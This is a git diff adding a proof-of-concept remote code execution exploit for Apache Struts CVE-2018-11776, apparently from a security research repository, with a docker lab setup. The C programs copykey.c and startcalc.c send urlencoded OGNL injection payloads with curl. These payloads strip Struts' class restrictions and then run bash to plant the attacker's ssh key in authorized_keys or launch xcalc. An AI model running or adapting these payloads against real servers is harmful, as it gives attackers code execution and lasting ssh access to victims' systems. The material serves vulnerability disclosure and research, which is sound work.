Merge remote-tracking branch 'semmle/master' into HEAD

Author: s0

Apache/Struts/CVE-2018-11776/README.md

@@ -0,0 +1,71 @@
+# Remote code execution in Apache Struts (CVE-2018-11776)
+
+This directory contains a proof-of-concept exploit for a remote code execution vulnerability in [Apache Struts](https://struts.apache.org/). The vulnerability was fixed in versions 2.3.35 and 2.5.17.
+
+To demonstrate the PoC in a safe environment, we will use two docker containers connected by a docker network bridge to simulate two separate computers: the first is the Struts server and the second is the attacker's computer. The Struts server uses Struts version 2.5.16, which contains the vulnerability.
+
+We have tried to make the `Dockerfile`'s for the server and attacker as simple as possible, to make it clear that we have used vanilla [Ubuntu 18.04](http://releases.ubuntu.com/18.04/) with no unusual packages installed.
+
+Because we have Struts running in docker with no graphics, it isn't convenient to pop a calculator. So, instead, we will use the vulnerability to get a shell on the server. The PoC is a little simplistic because it assumes that the server has its ssh port 22 exposed to the public internet. A more realistic attack would probably involve getting the server to connect out to a webserver controlled by the attacker. It would be straightforward to modify this PoC to do that.
+
+## Network setup
+
+Create a docker network bridge, to simulate a network with two separate computers.
+
+```
+docker network create -d bridge --subnet 172.16.0.0/16 struts-demo-network
+```
+
+## Struts server setup
+
+Build the docker image:
+
+```
+cd struts-server
+docker build . -t struts-server --build-arg UID=`id -u`
+```
+
+Start the container:
+
+```
+docker run --rm --network struts-demo-network --ip=172.16.0.10 -h struts-server --publish 8080:8080 -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix -i -t struts-server
+```
+
+Inside the container, start Struts and sshd. The reason for starting sshd is that we are going to use it to get a shell on the Struts server. We think it is realistic for sshd to be running because it is very widely used by system administrators for remote access.
+
+```
+./apache-tomcat-9.0.12/bin/catalina.sh start
+sudo service ssh start  # sudo password is "x"
+```
+
+At this point, you can check that Struts is running by visiting [http://127.0.0.1:8080/struts2-showcase](http://127.0.0.1:8080/struts2-showcase) in your browser. (We exposed port 8080 on the docker container.)
+
+## Attacker setup
+
+Build the docker image:
+
+```
+cd struts-attacker
+docker build . -t struts-attacker
+```
+
+Start the container:
+
+```
+docker run --rm --network struts-demo-network --ip=172.16.0.11 -h struts-attacker -i -t struts-attacker
+```
+
+Inside the container, use `copykey` to copy the attacker's ssh key into the server's `authorized_keys` file. Then use `ssh` to login.
+
+```
+./src/copykey http://172.16.0.10:8080/struts2-showcase
+ssh victim@172.16.0.10
+```
+
+We have a shell!
+
+Alternatively, you can start a calculator like this:
+
+```
+./src/startcalc http://172.16.0.10:8080/struts2-showcase
+```

Apache/Struts/CVE-2018-11776/struts-attacker/Dockerfile

@@ -0,0 +1,19 @@
+FROM ubuntu:bionic
+
+RUN apt-get update && \
+    apt-get install -y curl tmux emacs net-tools gcc ssh build-essential
+
+# Create user account for the attacker.
+RUN adduser attacker --disabled-password
+
+# Copy the exploit PoC into the attacker's home directory.
+COPY src /home/attacker/src
+RUN chown -R attacker:attacker /home/attacker/src
+
+# Switch over to the 'attacker' user, since root access is no longer required
+USER attacker
+WORKDIR /home/attacker
+RUN cd src && make
+
+# Create an ssh key for the attacker.
+RUN ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -q -P ""

Apache/Struts/CVE-2018-11776/struts-attacker/src/Makefile

@@ -0,0 +1,19 @@
+all: copykey startcalc
+
+clean:
+	rm -f *.o copykey startcalc
+
+copykey: copykey.o utils.o
+	gcc -Wall copykey.o utils.o -o copykey
+
+startcalc: startcalc.o utils.o
+	gcc -Wall startcalc.o utils.o -o startcalc
+
+copykey.o: copykey.c utils.h
+	gcc -c copykey.c
+
+startcalc.o: startcalc.c utils.h
+	gcc -c startcalc.c
+
+utils.o: utils.c utils.h
+	gcc -c utils.c

Apache/Struts/CVE-2018-11776/struts-attacker/src/copykey.c

@@ -0,0 +1,73 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include "utils.h"
+
+int main(int argc, char* argv[]) {
+  if (argc < 2) {
+    printf("usage example: http://172.16.0.10:8080/struts2-showcase\n");
+    return 1;
+  }
+
+  const char* url = argv[1];
+
+  // Scratch buffers for building the curl command line.
+  char scratch1[2048];
+  char scratch2[2048];
+  char scratch3[2048];
+  char cmd[4096];
+
+  // First OGNL payload, which we need to urlencode and send to the Struts
+  // server with curl.
+  const char* url1 =
+    "${(#_=#attr['struts.valueStack']).(#context=#_.getContext())."
+    "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl."
+    "OgnlUtil@class)).(#ognlUtil.setExcludedClasses(''))."
+    "(#ognlUtil.setExcludedPackageNames(''))}";
+
+  // urlencode the first payload and send it to the Struts server.
+  urlencode(scratch1, sizeof(scratch1), url1);
+  snprintf(cmd, sizeof(cmd), "curl %s/%s/actionChain1.action", url, scratch1);
+  system(cmd);
+
+  // Second OGNL payload. We need to paste our ssh key into the middle of
+  // this string and urlencode it.
+  const char* url2A =
+    "${(#_=#attr['struts.valueStack']).(#context=#_.getContext())."
+    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#context."
+    "setMemberAccess(#dm)).(#sl=@java.io.File@separator)."
+    "(#p=new java.lang.ProcessBuilder({'bash','-c','echo -n \"";
+  const char* url2B =
+    "\">>\"$HOME\"/.ssh/authorized_keys'})).(#p.start())}";
+
+  // Load our ssh key.
+  const int fd = open(".ssh/id_ed25519.pub", O_RDONLY);
+  if (fd < 0) {
+    printf("Could not open id_ed25519.pub\n");
+    return 1;
+  }
+  const int r = read(fd, scratch1, sizeof(scratch1));
+  if (r < 0) {
+    printf("Could not read id_ed25519.pub\n");
+    return 1;
+  }
+  scratch1[r] = '\0';
+
+  // Escape any slash characters in the ssh key, to stop Tomcat from
+  // intercepting them.
+  escape_forward_slash(scratch2, sizeof(scratch2), scratch1);
+
+  // Escape the slash characters in url2B.
+  escape_forward_slash(scratch3, sizeof(scratch3), url2B);
+
+  // urlencode the second payload and send it to the Struts server.
+  snprintf(scratch1, sizeof(scratch1), "%s%s%s", url2A, scratch2, scratch3);
+  urlencode(scratch2, sizeof(scratch2), scratch1);
+  snprintf(cmd, sizeof(cmd), "curl %s/%s/actionChain1.action", url, scratch2);
+  system(cmd);
+
+  return 0;
+}

Apache/Struts/CVE-2018-11776/struts-attacker/src/startcalc.c

@@ -0,0 +1,79 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include "utils.h"
+
+// NOTE:
+// This exploit will not normally work if Struts is running in a docker
+// container, because you cannot pop a calculator from inside docker. There
+// are two ways to solve this problem. The first solution is to pass the
+// following extra arguments on the `docker run` command line, to enable X
+// applications to run from within the container:
+//
+// ```
+// -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix
+// ```
+//
+// The second solution is to run Struts outside of docker. The easiest way
+// to do this is to follow the instructions in the README for building
+// Struts in docker. Then just copy the tomcat directory out of docker. To
+// do that, start docker like this:
+//
+// ```
+// docker run -v `pwd`:/home/victim/temp -i -t struts-server
+// ```
+//
+// And inside docker, copy the tomcat directory into `temp` which is mapped
+// to the directory that you started docker from:
+//
+// ```
+// cp -r apache-tomcat-9.0.12/ temp/
+// ```
+
+int main(int argc, char* argv[]) {
+  if (argc < 2) {
+    printf("usage example: http://172.16.0.10:8080/struts2-showcase\n");
+    return 1;
+  }
+
+  const char* url = argv[1];
+
+  // Scratch buffers for building the curl command line.
+  char scratch1[2048];
+  char scratch2[2048];
+  char cmd[4096];
+
+  // First OGNL payload, which we need to urlencode and send to the Struts
+  // server with curl.
+  const char* url1 =
+    "${(#_=#attr['struts.valueStack']).(#context=#_.getContext())."
+    "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl."
+    "OgnlUtil@class)).(#ognlUtil.setExcludedClasses(''))."
+    "(#ognlUtil.setExcludedPackageNames(''))}";
+
+  // urlencode the first payload and send it to the Struts server.
+  urlencode(scratch1, sizeof(scratch1), url1);
+  snprintf(cmd, sizeof(cmd), "curl %s/%s/actionChain1.action", url, scratch1);
+  system(cmd);
+
+  // Second OGNL payload. We need to paste our ssh key into the middle of
+  // this string and urlencode it.
+  const char* url2 =
+    "${(#_=#attr['struts.valueStack']).(#context=#_.getContext())."
+    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#context."
+    "setMemberAccess(#dm)).(#sl=@java.io.File@separator)."
+    "(#p=new java.lang.ProcessBuilder({'bash','-c','xcalc'})).(#p.start())}";
+
+  // Escape any slash characters in the ssh key, to stop Tomcat from
+  // intercepting them.
+  escape_forward_slash(scratch1, sizeof(scratch1), url2);
+
+  urlencode(scratch2, sizeof(scratch2), scratch1);
+  snprintf(cmd, sizeof(cmd), "curl %s/%s/actionChain1.action", url, scratch2);
+  system(cmd);
+
+  return 0;
+}

Apache/Struts/CVE-2018-11776/struts-attacker/src/utils.c

@@ -0,0 +1,63 @@
+#include <string.h>
+#include <stdio.h>
+#include "utils.h"
+
+// Replace / with '+#sl+'. This is needed to sneak / characters past Tomcat.
+// It is based on the assumption that the string will be enclosed in
+// single quotes.
+int escape_forward_slash(char* dst, size_t dstlen, const char* src) {
+  for (;; src++) {
+    const char c = *src;
+    if (c == '\0') {
+      if (dstlen < 1) {
+        return -1;
+      }
+      *dst = '\0';
+      return 0;
+    } else if (c == '/') {
+      if (dstlen < 7) {
+        return -1;
+      }
+      memcpy(dst, "'+#sl+'", 7);
+      dst += 7;
+      dstlen -= 7;
+    } else {
+      if (dstlen < 1) {
+        return -1;
+      }
+      *dst = c;
+      dst++;
+      dstlen--;
+    }
+  }
+}
+
+int urlencode(char* dst, size_t dstlen, const char* src) {
+  for (;; src++) {
+    const char c = *src;
+    if (c == '\0') {
+      if (dstlen < 1) {
+        return -1;
+      }
+      *dst = '\0';
+      return 0;
+    } else if (('a' <= c && c <= 'z') ||
+	       ('A' <= c && c <= 'Z') ||
+	       ('0' <= c && c <= '9') ||
+	       c == '-' || c == '_' || c == '.' || c == '~') {
+      if (dstlen < 1) {
+        return -1;
+      }
+      *dst = c;
+      dst++;
+      dstlen--;
+    } else {
+      if (dstlen < 3) {
+        return -1;
+      }
+      sprintf(dst, "%%%.2x", c);
+      dst += 3;
+      dstlen -= 3;
+    }
+  }
+}

Apache/Struts/CVE-2018-11776/struts-attacker/src/utils.h

@@ -0,0 +1,2 @@
+int escape_forward_slash(char* dst, size_t dstlen, const char* src);
+int urlencode(char* dst, size_t dstlen, const char* src);

Apache/Struts/CVE-2018-11776/struts-server/Dockerfile

@@ -0,0 +1,43 @@
+FROM ubuntu:bionic
+
+RUN apt-get update && \
+    apt-get install -y \
+      openjdk-8-jdk git curl zip unzip \
+      tmux sudo emacs maven openssh-server net-tools x11-apps
+
+ARG UID=1000
+
+# Create a non-root user account to run Struts.
+RUN adduser victim --disabled-password --uid $UID
+
+# Grant the 'victim' user sudo access, so that we can start sshd.
+RUN adduser victim sudo
+RUN echo "victim:x" | chpasswd
+
+# Switch over to the 'victim' user, since root access is no longer required
+USER victim
+WORKDIR /home/victim
+
+# Create an ssh authorized keys file. Systems administrators would add their
+# public key to this file so that they can login remotely with ssh.
+RUN mkdir -m 700 ~/.ssh && touch ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys
+
+# Get Struts source code.
+RUN git clone https://github.com/apache/struts.git
+
+# Checkout vulnerable version.
+RUN cd struts && git branch struts_2_5_16 STRUTS_2_5_16 && git checkout struts_2_5_16
+
+# Remove namespace from configuration file.
+COPY struts-actionchaining.xml /home/victim/struts/apps/showcase/src/main/resources/struts-actionchaining.xml
+
+# Build Struts.
+RUN cd struts/apps/showcase && mvn clean package -DskipTests
+
+# Get Tomcat.
+RUN curl http://mirror.ox.ac.uk/sites/rsync.apache.org/tomcat/tomcat-9/v9.0.12/bin/apache-tomcat-9.0.12.zip -O
+RUN unzip apache-tomcat-9.0.12.zip && rm apache-tomcat-9.0.12.zip
+
+# Deploy the webapp.
+RUN cp struts/apps/showcase/target/struts2-showcase.war apache-tomcat-9.0.12/webapps/
+RUN chmod 755 apache-tomcat-9.0.12/bin/catalina.sh